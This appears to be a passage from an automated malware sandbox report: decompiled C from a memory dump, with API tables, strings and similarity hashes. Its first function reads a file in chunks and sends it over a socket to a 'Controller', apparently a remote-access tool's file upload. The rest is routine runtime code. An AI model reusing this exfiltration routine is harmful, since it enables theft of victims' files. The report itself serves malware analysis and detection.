					_t126 = E00450880(_v52, _v48, 0x186a0, 0);
					_t210 = _t280;
					asm("xorps xmm0, xmm0");
					_v88 = _t126 + 1;
					asm("adc ecx, ebx");
					asm("movlpd [ebp-0x3c], xmm0");
					_v84.LowPart = _t280;
					__eflags = _v48;
					if(__eflags < 0) {
						L17:
						CloseHandle(_t297);
						E00404E0B(_t299);
						_t198 = 1;
					} else {
						if(__eflags > 0) {
							L5:
							_v44 = _v64.HighPart.LowPart;
							_v64.HighPart.LowPart = _v64;
							_t136 = 0x186a0;
							goto L6;
							do {
								do {
									L6:
									_t281 = _v32;
									__eflags = _v20 - _t281;
									if(__eflags >= 0) {
										_t210 = _v16.LowPart;
										if(__eflags > 0) {
											L9:
											_t136 = _t210;
											_v20 = _t281;
											_v28 = _t136;
										} else {
											__eflags = _t136 - _t210;
											if(__eflags > 0) {
												goto L9;
											}
										}
									}
									_push(_t136);
									_t137 = E0042F4C6(_t210, _t281, _t299, __eflags);
									_push(0);
									_v12 = _t137;
									_v24 = 0;
									_t138 = SetFilePointerEx(_t297, _v64.HighPart.LowPart, _v44, 0);
									__eflags = _t138;
									if(_t138 == 0) {
										_t306 = _t305 - 0x18;
										_t216 = _t305 - 0x18;
										_push("SetFilePointerEx error");
										goto L23;
									} else {
										_t148 = ReadFile(_t297, _v12, _v28,  &_v24, 0);
										__eflags = _t148;
										if(_t148 == 0) {
											_t306 = _t305 - 0x18;
											_t216 = _t305 - 0x18;
											_push("ReadFile error");
											L23:
											E00402084(0, _t216);
											E00402084(0, _t306 - 0x18, "[ERROR]");
											L00416C80(0, _t297);
											E0042F4CF(_v12);
											CloseHandle(_t297);
											goto L24;
										} else {
											__eflags = _v24;
											if(__eflags == 0) {
												E0042F4CF(_v12);
												CloseHandle(_t297);
												E00404E0B(_t299);
												_t145 = 1;
												goto L25;
											} else {
												E0040427F(0,  &_v112, _a4);
												_t154 = E004020AB(0,  &_v472, _t281, __eflags, _v12, _v24);
												_t305 = _t305 - 0x18;
												_t156 = E00417260(0x46c238,  &_v448, _v88, _v84);
												_t157 = E00417260(0x46c238,  &_v424, _v36, _v40);
												L00402F1D(_t305, L00402F93(0x46c238,  &_v136, L00402F93(0x46c238,  &_v160, L00402F93(0x46c238,  &_v184, L00402F1D( &_v208, L00402F93(0x46c238,  &_v232, L00402F1D( &_v256, L00402F93(0x46c238,  &_v280, L00402F93(0x46c238,  &_v304, L00402F93(0x46c238,  &_v328, L00402F93(0x46c238,  &_v352, L00402F93(0x46c238,  &_v376, E0041739C(0x46c238,  &_v400,  &_v112), __eflags, 0x46c238), __eflags,  &_a8), __eflags, 0x46c238), __eflags,  &_a32), __eflags, 0x46c238), _t157), __eflags, 0x46c238), _t156), __eflags, 0x46c238), __eflags,  &_a56), __eflags, 0x46c238), _t154);
												_t299 = _v68;
												_push(0x52);
												_t173 = E00404AA4(0x46c238, _v68, _t171, __eflags);
												__eflags = _t173 - 0xffffffff;
												E00401FC7();
												E00401FC7();
												E00401FC7();
												E00401FC7();
												E00401FC7();
												E00401FC7();
												E00401FC7();
												E00401FC7();
												E00401FC7();
												E00401FC7();
												E00401FC7();
												E00401FC7();
												E00401FC7();
												E00401FC7();
												E00401FC7();
												L00401EF0();
												__eflags = 0x46c200 | _t173 == 0xffffffff;
												if((0x46c200 | _t173 == 0xffffffff) != 0) {
													E00404E0B(_t299);
													CloseHandle(_t297);
													E0042F4CF(_v12);
													_t198 = 0;
												} else {
													goto L14;
												}
											}
										}
									}
									goto L18;
									L14:
									E0042F4CF(_v12);
									_t136 = _v28;
									_v16.LowPart = _v16 - _t136;
									_t295 = _v44;
									asm("sbb ecx, [ebp-0x10]");
									_v36 = _v36 + 1;
									_push(0);
									_pop(0);
									asm("adc [ebp-0x24], ebx");
									_t210 = _v64.HighPart.LowPart + _t136;
									_v64.HighPart = _t210;
									asm("adc edx, [ebp-0x10]");
									_v44 = _t295;
									__eflags = _t295 - _v48;
								} while (__eflags < 0);
								if(__eflags > 0) {
									goto L17;
								} else {
									goto L16;
								}
								goto L18;
								L16:
								__eflags = _t210 - _v52;
							} while (_t210 < _v52);
							goto L17;
						} else {
							__eflags = _v52;
							if(_v52 <= 0) {
								goto L17;
							} else {
								goto L5;
							}
						}
					}
				} else {
					E004020EC(0, _t302 - 0x18, _t278, _t310,  &_a8);
					_push(0x53);
					E00404AA4(0, 0x46c2e8, _t278, _t310);
					L24:
					E00404E0B(_t299);
					_t145 = 0;
					L25:
					_t198 = _t145;
				}
				L18:
				E00401FC7();
				E00401FC7();
				E00401FC7();
				return _t198;
			}

0x004064a2
0x004064ae
0x004064b1
0x004064b6
0x004064c0
0x004064c1
0x004064c2
0x004064c3
0x004064c4
0x004064c9
0x004064d0
0x004064ea
0x004064f3
0x004064f5
0x004064f8
0x0040651c
0x00406521
0x00406524
0x0040652a
0x0040652d
0x00406533
0x00406536
0x0040653c
0x0040653f
0x00406542
0x00406550
0x00406555
0x00406558
0x00406560
0x00406565
0x0040656f
0x00406574
0x00406579
0x00406582
0x0040658a
0x00406595
0x004065a0
0x004065a6
0x004065ae
0x004065b0
0x004065b3
0x004065b6
0x004065b8
0x004065bd
0x004065c0
0x004065c3
0x00406864
0x00406865
0x0040686d
0x00406872
0x004065c9
0x004065c9
0x004065d4
0x004065d7
0x004065dd
0x004065e0
0x004065e0
0x004065e5
0x004065e5
0x004065e5
0x004065e5
0x004065e8
0x004065eb
0x004065ed
0x004065f0
0x004065f6
0x004065f6
0x004065f8
0x004065fb
0x004065f2
0x004065f2
0x004065f4
0x00000000
0x00000000
0x004065f4
0x004065f0
0x004065fe
0x004065ff
0x00406605
0x0040660a
0x00406610
0x00406614
0x0040661a
0x0040661c
0x004068da
0x004068dd
0x004068df
0x00000000
0x00406622
0x0040662f
0x00406635
0x00406637
0x004068ce
0x004068d1
0x004068d3
0x004068e4
0x004068e4
0x004068f3
0x004068f8
0x00406900
0x00406909
0x00000000
0x0040663d
0x0040663d
0x00406641
0x004068b5
0x004068bc
0x004068c4
0x004068cb
0x00000000
0x00406647
0x0040664d
0x0040665e
0x00406663
0x00406680
0x00406695
0x00406754
0x00406759
0x0040675d
0x00406761
0x00406766
0x00406772
0x0040677d
0x00406788
0x00406793
0x0040679e
0x004067a9
0x004067b4
0x004067bf
0x004067ca
0x004067d5
0x004067e0
0x004067eb
0x004067f6
0x00406801
0x0040680c
0x00406814
0x00406819
0x0040681b
0x00406899
0x0040689f
0x004068a8
0x004068ae
0x00000000
0x00000000
0x00000000
0x0040681b
0x00406641
0x00406637
0x00000000
0x0040681d
0x00406820
0x00406825
0x00406828
0x0040682b
0x00406832
0x00406835
0x00406839
0x00406841
0x00406842
0x00406845
0x00406847
0x0040684a
0x0040684d
0x00406850
0x00406850
0x00406859
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040685b
0x0040685b
0x0040685b
0x00000000
0x004065cb
0x004065cb
0x004065ce
0x00000000
0x00000000
0x00000000
0x00000000
0x004065ce
0x004065c9
0x004064fa
0x00406503
0x00406508
0x0040650f
0x0040690f
0x00406911
0x00406916
0x00406918
0x00406918
0x00406918
0x00406874
0x00406877
0x0040687f
0x00406887
0x00406894

APIs

Part of subcall function 00404A08: connect.WS2_32(?,?,00000010), ref: 00404A23

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004064ED
GetFileSizeEx.KERNEL32(00000000,?), ref: 00406524
__aulldiv.LIBCMT ref: 004065A6
SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,000186A0,00000000), ref: 00406614
ReadFile.KERNEL32(00000000,?,000186A0,?,00000000), ref: 0040662F

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

Part of subcall function 00404E0B: closesocket.WS2_32(?), ref: 00404E11

Strings

ReadFile error, xrefs: 004068D3
SetFilePointerEx error, xrefs: 004068DF
Uploading file to Controller: , xrefs: 00406558
[ERROR], xrefs: 004068EE
[Info], xrefs: 0040656A

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: File$CreatePointerReadSize__aulldivclosesocketconnectsend
String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $[ERROR]$[Info]
API String ID: 1319223106-2190262076
Opcode ID: bb9b9e046f18df13769a8b787e7ac1b47d7a5fbf9c12ca0a2a4058909c6e6bd6
Instruction ID: 173749a7d42c5eabba2dba03019d43edcf8f50480dc145d367e539a2da324ad2
Opcode Fuzzy Hash: bb9b9e046f18df13769a8b787e7ac1b47d7a5fbf9c12ca0a2a4058909c6e6bd6
Instruction Fuzzy Hash: F5C16B31A00219ABCB14FBA5DD829EEB7B5AF44304F10817FF406B62D1EF385A449F99

Uniqueness

Uniqueness Score: -1.00%

Function 0043F5AB, Relevance: 22.8, APIs: 15, Instructions: 296
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0043F5AB(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				char _v21;
				intOrPtr _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				intOrPtr* _v44;
				signed int _v48;
				void* _v52;
				signed int* _v56;
				intOrPtr _v60;
				intOrPtr* _v64;
				signed int* _v68;
				void* _v72;
				char _v76;
				signed int _t101;
				signed int _t123;
				signed short _t126;
				void* _t130;
				void* _t134;
				void* _t137;
				void* _t138;
				intOrPtr _t139;
				void* _t141;
				signed int _t142;
				intOrPtr* _t143;
				signed char _t160;
				signed char _t165;
				signed int _t166;
				void* _t168;
				signed int _t170;
				void* _t179;
				signed int* _t180;
				signed int* _t181;
				signed int _t182;
				signed char* _t189;
				signed char* _t190;
				signed int _t192;
				void* _t193;
				intOrPtr _t197;
				short* _t209;
				intOrPtr* _t211;
				intOrPtr* _t215;
				signed int _t216;
				signed int _t217;
				void* _t218;
				void* _t219;

				_t101 =  *0x46a00c; // 0x1e1e4200
				_v8 = _t101 ^ _t217;
				_t211 = _a4;
				_t170 = 0;
				_v64 = _t211;
				_v32 = 0;
				_t172 =  *((intOrPtr*)(_t211 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v52 = 0;
				_v76 = _t211;
				_v72 = 0;
				if( *((intOrPtr*)(_t211 + 0xa8)) == 0) {
					__eflags =  *(_t211 + 0x8c);
					if( *(_t211 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t211 + 0x8c) = _t170;
					__eflags = 0;
					 *(_t211 + 0x90) = _t170;
					 *_t211 = 0x4577b8;
					 *((intOrPtr*)(_t211 + 0x94)) = 0x457a38;
					 *((intOrPtr*)(_t211 + 0x98)) = 0x457bb8;
					 *((intOrPtr*)(_t211 + 4)) = 1;
					L41:
					return L0042FD1B(_v8 ^ _t217);
				}
				_t106 = _t211 + 8;
				_v44 = 0;
				if( *(_t211 + 8) != 0) {
					L3:
					_v44 = E0043F348(_t172, 1, 4);
					E004401F5(_t170);
					_v32 = E0043F348(_t172, 0x180, 2);
					E004401F5(_t170);
					_v36 = E0043F348(_t172, 0x180, 1);
					E004401F5(_t170);
					_v40 = E0043F348(_t172, 0x180, 1);
					E004401F5(_t170);
					_t197 = E0043F348(_t172, 0x101, 1);
					_v52 = _t197;
					E004401F5(_t170);
					_t219 = _t218 + 0x3c;
					if(_v44 == _t170 || _v32 == _t170 || _t197 == 0 || _v36 == _t170 || _v40 == _t170) {
						L36:
						E004401F5(_v44);
						E004401F5(_v32);
						E004401F5(_v36);
						E004401F5(_v40);
						_t170 = 1;
						__eflags = 1;
						goto L37;
					} else {
						_t123 = _t170;
						do {
							 *(_t123 + _t197) = _t123;
							_t123 = _t123 + 1;
						} while (_t123 < 0x100);
						if(GetCPInfo( *(_t211 + 8),  &_v28) == 0) {
							goto L36;
						}
						_t126 = _v28;
						_t235 = _t126 - 5;
						if(_t126 > 5) {
							goto L36;
						}
						_t28 = _t197 + 1; // 0x1
						_v48 = _t126 & 0x0000ffff;
						_t192 = 0xff;
						_t130 = E0044480C(_t197, _t211, _t235, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						_t236 = _t130;
						if(_t130 == 0) {
							goto L36;
						}
						_t34 = _t197 + 1; // 0x1
						_t134 = E0044480C(_t197, _t211, _t236, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						if(_t134 == 0) {
							goto L36;
						}
						if(_v48 <= 1 || _v22 == _t170) {
							L22:
							_v60 = _v32 + 0x100;
							_t137 = E004493AC(_t170, _t192, _t197, _t211, _t242, _t170, 1, _t197, 0x100, _v32 + 0x100,  *(_t211 + 8), _t170);
							_t219 = _t219 + 0x1c;
							if(_t137 == 0) {
								goto L36;
							}
							_t193 = _v32;
							_t138 = _t193 + 0xfe;
							 *_t138 = 0;
							_t179 = _v36;
							_v32 = _t138;
							_t139 = _v40;
							 *(_t179 + 0x7f) = _t170;
							_t180 = _t179 - 0xffffff80;
							 *(_t139 + 0x7f) = _t170;
							_v68 = _t180;
							 *_t180 = _t170;
							_t181 = _t139 + 0x80;
							_v56 = _t181;
							 *_t181 = _t170;
							if(_v48 <= 1 || _v22 == _t170) {
								L32:
								_t182 = 0x3f;
								memcpy(_t193, _t193 + 0x200, _t182 << 2);
								_push(0x1f);
								asm("movsw");
								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
								_push(0x1f);
								asm("movsw");
								asm("movsb");
								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
								asm("movsw");
								asm("movsb");
								_t215 = _v64;
								if( *((intOrPtr*)(_t215 + 0x8c)) != 0) {
									asm("lock xadd [ecx], eax");
									if((_t142 | 0xffffffff) == 0) {
										E004401F5( *(_t215 + 0x90) - 0xfe);
										E004401F5( *(_t215 + 0x94) - 0x80);
										E004401F5( *(_t215 + 0x98) - 0x80);
										E004401F5( *((intOrPtr*)(_t215 + 0x8c)));
									}
								}
								_t143 = _v44;
								 *_t143 = 1;
								 *((intOrPtr*)(_t215 + 0x8c)) = _t143;
								 *_t215 = _v60;
								 *(_t215 + 0x90) = _v32;
								 *(_t215 + 0x94) = _v68;
								 *(_t215 + 0x98) = _v56;
								 *(_t215 + 4) = _v48;
								L37:
								E004401F5(_v52);
								goto L41;
							} else {
								_t189 =  &_v21;
								while(1) {
									_t160 =  *_t189;
									if(_t160 == 0) {
										break;
									}
									_t216 =  *(_t189 - 1) & 0x000000ff;
									if(_t216 > (_t160 & 0x000000ff)) {
										L30:
										_t189 =  &(_t189[2]);
										if( *(_t189 - 1) != _t170) {
											continue;
										}
										break;
									}
									_t209 = _t193 + 0x100 + _t216 * 2;
									do {
										_t216 = _t216 + 1;
										 *_t209 = 0x8000;
										_t209 = _t209 + 2;
									} while (_t216 <= ( *_t189 & 0x000000ff));
									goto L30;
								}
								goto L32;
							}
						} else {
							_t190 =  &_v21;
							while(1) {
								_t165 =  *_t190;
								if(_t165 == 0) {
									goto L22;
								}
								_t192 =  *(_t190 - 1) & 0x000000ff;
								_t166 = _t165 & 0x000000ff;
								while(_t192 <= _t166) {
									 *((char*)(_t192 + _t197)) = 0x20;
									_t192 = _t192 + 1;
									__eflags = _t192;
									_t166 =  *_t190 & 0x000000ff;
								}
								_t190 =  &(_t190[2]);
								_t242 =  *(_t190 - 1) - _t170;
								if( *(_t190 - 1) != _t170) {
									continue;
								}
								goto L22;
							}
							goto L22;
						}
					}
				}
				_t168 = E0044B0F4(0, __edx, __edi, _t211,  &_v76, 0, _t172, 0x1004, _t106);
				_t219 = _t218 + 0x14;
				if(_t168 != 0) {
					goto L36;
				}
				goto L3;
			}

0x0043f5b3
0x0043f5ba
0x0043f5bf
0x0043f5c2
0x0043f5c5
0x0043f5c8
0x0043f5cb
0x0043f5d1
0x0043f5d4
0x0043f5d7
0x0043f5da
0x0043f5dd
0x0043f5e2
0x0043f902
0x0043f904
0x0043f906
0x0043f906
0x0043f909
0x0043f90f
0x0043f911
0x0043f917
0x0043f91d
0x0043f927
0x0043f931
0x0043f938
0x0043f948
0x0043f948
0x0043f5e8
0x0043f5eb
0x0043f5f0
0x0043f60e
0x0043f618
0x0043f61b
0x0043f62e
0x0043f631
0x0043f63f
0x0043f642
0x0043f650
0x0043f653
0x0043f664
0x0043f667
0x0043f66a
0x0043f66f
0x0043f675
0x0043f8c9
0x0043f8cc
0x0043f8d4
0x0043f8dc
0x0043f8e4
0x0043f8ee
0x0043f8ee
0x00000000
0x0043f69e
0x0043f69e
0x0043f6a0
0x0043f6a0
0x0043f6a3
0x0043f6a4
0x0043f6ba
0x00000000
0x00000000
0x0043f6c0
0x0043f6c3
0x0043f6c6
0x00000000
0x00000000
0x0043f6d3
0x0043f6d6
0x0043f6d9
0x0043f6f6
0x0043f6fb
0x0043f6fe
0x0043f700
0x00000000
0x00000000
0x0043f71a
0x0043f72a
0x0043f72f
0x0043f734
0x00000000
0x00000000
0x0043f73e
0x0043f76b
0x0043f781
0x0043f784
0x0043f789
0x0043f78e
0x00000000
0x00000000
0x0043f794
0x0043f799
0x0043f79f
0x0043f7a2
0x0043f7a5
0x0043f7a8
0x0043f7ab
0x0043f7ae
0x0043f7b5
0x0043f7b8
0x0043f7bb
0x0043f7bd
0x0043f7c3
0x0043f7c6
0x0043f7c8
0x0043f80a
0x0043f80c
0x0043f815
0x0043f81a
0x0043f81d
0x0043f827
0x0043f829
0x0043f82c
0x0043f82e
0x0043f837
0x0043f839
0x0043f83b
0x0043f83c
0x0043f847
0x0043f84c
0x0043f850
0x0043f85e
0x0043f871
0x0043f87f
0x0043f88a
0x0043f88f
0x0043f850
0x0043f892
0x0043f895
0x0043f89b
0x0043f8a4
0x0043f8a9
0x0043f8b2
0x0043f8bb
0x0043f8c4
0x0043f8ef
0x0043f8f2
0x00000000
0x0043f7cf
0x0043f7cf
0x0043f7d2
0x0043f7d2
0x0043f7d6
0x00000000
0x00000000
0x0043f7d8
0x0043f7e1
0x0043f7ff
0x0043f7ff
0x0043f805
0x00000000
0x00000000
0x00000000
0x0043f805
0x0043f7e9
0x0043f7ec
0x0043f7f1
0x0043f7f2
0x0043f7f5
0x0043f7fb
0x00000000
0x0043f7ec
0x00000000
0x0043f807
0x0043f745
0x0043f745
0x0043f748
0x0043f748
0x0043f74c
0x00000000
0x00000000
0x0043f74e
0x0043f752
0x0043f75f
0x0043f757
0x0043f75b
0x0043f75b
0x0043f75c
0x0043f75c
0x0043f763
0x0043f766
0x0043f769
0x00000000
0x00000000
0x00000000
0x0043f769
0x00000000
0x0043f748
0x0043f73e
0x0043f675
0x0043f5fe
0x0043f603
0x0043f608
0x00000000
0x00000000
0x00000000

APIs

_free.LIBCMT ref: 0043F61B
_free.LIBCMT ref: 0043F631
_free.LIBCMT ref: 0043F642
_free.LIBCMT ref: 0043F653
_free.LIBCMT ref: 0043F66A
GetCPInfo.KERNEL32(?,?), ref: 0043F6B2

Part of subcall function 0044B0F4: _free.LIBCMT ref: 0044B15F

_free.LIBCMT ref: 0043F85E
_free.LIBCMT ref: 0043F871
_free.LIBCMT ref: 0043F87F
_free.LIBCMT ref: 0043F88A
_free.LIBCMT ref: 0043F8CC
_free.LIBCMT ref: 0043F8D4
_free.LIBCMT ref: 0043F8DC
_free.LIBCMT ref: 0043F8E4
_free.LIBCMT ref: 0043F8F2

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 8d12937895a689a0fc1618eb322085a7c6d1619a4aaa321216cef68aaf358591
Instruction ID: 1e5099d4cf7091294613e4cd6a63c328f2291409cd47a3a75e98f44bfb697c1d
Opcode Fuzzy Hash: 8d12937895a689a0fc1618eb322085a7c6d1619a4aaa321216cef68aaf358591
Instruction Fuzzy Hash: FEB18E71D002059FEB15AFB9C881BEEBBB4BF08304F14407EE955A7352DB7998498B68

Uniqueness

Uniqueness Score: -1.00%

Function 00449546, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00449546(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x46a188) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E004401F5(_t46);
							E00448782( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E004401F5(_t47);
							L00448C3C( *((intOrPtr*)(_t74 + 0x88)));
						}
						E004401F5( *((intOrPtr*)(_t74 + 0x7c)));
						E004401F5( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E004401F5( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E004401F5( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E004401F5( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E004401F5( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E004496B9( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0xa0
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x28
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x46a2a8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E004401F5(_t31);
							E004401F5( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E004401F5(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E004401F5(_t74);
			}

0x0044954e
0x00449552
0x0044955a
0x00449563
0x00449568
0x0044956f
0x00449577
0x0044957f
0x0044958a
0x00449590
0x00449591
0x00449599
0x004495a1
0x004495ac
0x004495b2
0x004495b6
0x004495c1
0x004495c7
0x00449568
0x004495c8
0x004495d0
0x004495e3
0x004495f6
0x00449604
0x0044960f
0x00449614
0x0044961d
0x00449625
0x00449626
0x00449626
0x0044962c
0x0044962f
0x0044962f
0x00449632
0x00449639
0x0044963b
0x0044963f
0x00449647
0x0044964e
0x00449654
0x00449655
0x00449655
0x0044965c
0x0044965e
0x00449663
0x0044966b
0x00449670
0x00449671
0x00449671
0x00449674
0x00449677
0x0044967a
0x0044967d
0x0044967d
0x0044968f

APIs

___free_lconv_mon.LIBCMT ref: 0044958A

Part of subcall function 00448782: _free.LIBCMT ref: 0044879F
Part of subcall function 00448782: _free.LIBCMT ref: 004487B1
Part of subcall function 00448782: _free.LIBCMT ref: 004487C3
Part of subcall function 00448782: _free.LIBCMT ref: 004487D5
Part of subcall function 00448782: _free.LIBCMT ref: 004487E7
Part of subcall function 00448782: _free.LIBCMT ref: 004487F9
Part of subcall function 00448782: _free.LIBCMT ref: 0044880B
Part of subcall function 00448782: _free.LIBCMT ref: 0044881D
Part of subcall function 00448782: _free.LIBCMT ref: 0044882F
Part of subcall function 00448782: _free.LIBCMT ref: 00448841
Part of subcall function 00448782: _free.LIBCMT ref: 00448853
Part of subcall function 00448782: _free.LIBCMT ref: 00448865
Part of subcall function 00448782: _free.LIBCMT ref: 00448877

_free.LIBCMT ref: 0044957F

Part of subcall function 004401F5: RtlFreeHeap.NTDLL(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D

_free.LIBCMT ref: 004495A1
_free.LIBCMT ref: 004495B6
_free.LIBCMT ref: 004495C1
_free.LIBCMT ref: 004495E3
_free.LIBCMT ref: 004495F6
_free.LIBCMT ref: 00449604
_free.LIBCMT ref: 0044960F
_free.LIBCMT ref: 00449647
_free.LIBCMT ref: 0044964E
_free.LIBCMT ref: 0044966B
_free.LIBCMT ref: 00449683

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 8a20b96b7aaffb75a5641ff102c264423d38ea1ece813b4e11af4ccf0b9ee35c
Instruction ID: bc7df33f33a806a4e6538402b94214bd38d1e854ce5dbc401830de06ad29eac0
Opcode Fuzzy Hash: 8a20b96b7aaffb75a5641ff102c264423d38ea1ece813b4e11af4ccf0b9ee35c
Instruction Fuzzy Hash: 46316B32600601AFFB21AA3AD845B5B73E8AF01354F21441FE659D7251DF3AAD509B2C

Uniqueness

Uniqueness Score: -1.00%

Function 00448880, Relevance: 18.4, APIs: 12, Instructions: 376
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00448880(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t105;
				char _t195;
				char _t210;
				signed int _t213;
				void* _t224;
				char* _t226;
				signed int _t227;
				signed int _t231;
				signed int _t232;
				void* _t234;
				void* _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				char* _t257;

				_t224 = __edx;
				_t210 = _a4;
				_v16 = 0;
				_v28 = _t210;
				_v24 = 0;
				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
					_t234 = E0043F348(0, 1, 0x50);
					_v8 = _t234;
					E004401F5(0);
					if(_t234 != 0) {
						_t227 = E0043F348(0, 1, 4);
						_v12 = _t227;
						E004401F5(0);
						if(_t227 != 0) {
							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
								_t213 = 0x14;
								memcpy(_v8, 0x46a188, _t213 << 2);
								L25:
								_t236 = _v8;
								_t231 = _v16;
								 *_t236 =  *( *(_t210 + 0x88));
								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t231 != 0) {
									 *_t231 = 1;
								}
								goto L27;
							}
							_t232 = E0043F348(0, 1, 4);
							_v16 = _t232;
							E004401F5(0);
							if(_t232 != 0) {
								_t233 =  *((intOrPtr*)(_t210 + 0xac));
								_t14 = _t234 + 0xc; // 0xc
								_t237 = E0044B0F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t234,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x15, _t14);
								_t238 = _t237 | E0044B0F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t237,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x14, _v8 + 0x10);
								_t239 = _t238 | E0044B0F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14);
								_t240 = _t239 | E0044B0F4(_t210, _t224, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18);
								_v20 = _v8 + 0x1c;
								_t241 = _t240 | E0044B0F4(_t210, _t224, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c);
								_t242 = _t241 | E0044B0F4(_t210, _t224, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20);
								_t243 = _t242 | E0044B0F4(_t210, _t224, _t233, _t242,  &_v28, 1, _t233, 0x51, _v8 + 0x24);
								_t244 = _t243 | E0044B0F4(_t210, _t224, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28);
								_t245 = _t244 | E0044B0F4(_t210, _t224, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29);
								_t246 = _t245 | E0044B0F4(_t210, _t224, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a);
